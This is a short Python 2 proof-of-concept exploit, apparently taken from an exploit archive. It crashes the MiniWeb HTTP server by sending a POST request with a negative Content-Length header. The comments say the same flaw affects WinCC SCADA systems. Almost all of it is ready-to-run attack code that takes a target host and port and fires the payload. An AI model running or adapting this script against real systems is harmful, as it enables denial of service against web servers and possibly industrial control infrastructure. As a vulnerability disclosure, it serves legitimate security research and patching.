MiniWeb Content-Length DoS PoC Exploit

1. #!/usr/bin/env python
2. # miniweb Content-Length DoS PoC
3. # Not a 0day, sadly.
4. # aluigi found this ages back, I independantly rediscovered it fuzzing
5. # and noticed it was still unpatched. Oh well, better disclose so!
6. # vuln version at code.google.com/p/miniweb/
7. # affects WinCC also :) (Oh, them SCADA...)
8. # Massive props to ohdae for helping with this!
9. # insecurety.net | bindshell.it.cx
10. import sys
11. import socket
12.  
13. def banner():
14.     print """
15. MiniWeb Killer - Kills MiniWeb
16. -Insecurety Research
17. -Bindshell Labs
18. """
19.  
20. if len(sys.argv) != 3:
21.     banner()
22.     print "Usage: ./MiniDoS.py <host> <port>"
23.     sys.exit(1)
24.  
25. banner()
26. target = sys.argv[1]
27. port = sys.argv[2]
28.  
29. evil = "POST / HTTP/1.1\r\n"
30. evil += "Host: %s\r\n" %(target)
31. evil += "User-Agent: MiniWeb Killer ^-^\r\n"
32. evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
33. expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
34. try:
35.     expl.connect((target, int(port)))
36.     print "[+] Connected, firing das payload!"
37. except:
38.     print "[-] Connection Failed... Is there even a target?"
39.     sys.exit(1)
40. try:
41.     expl.send(evil)
42.     print "[+] Payload Sent!"
43. except:
44.     print "[-] Payload Sending Failure... WTF?"
45.     sys.exit(1)
46. expl.close()
47. print "[*] Should be dead..."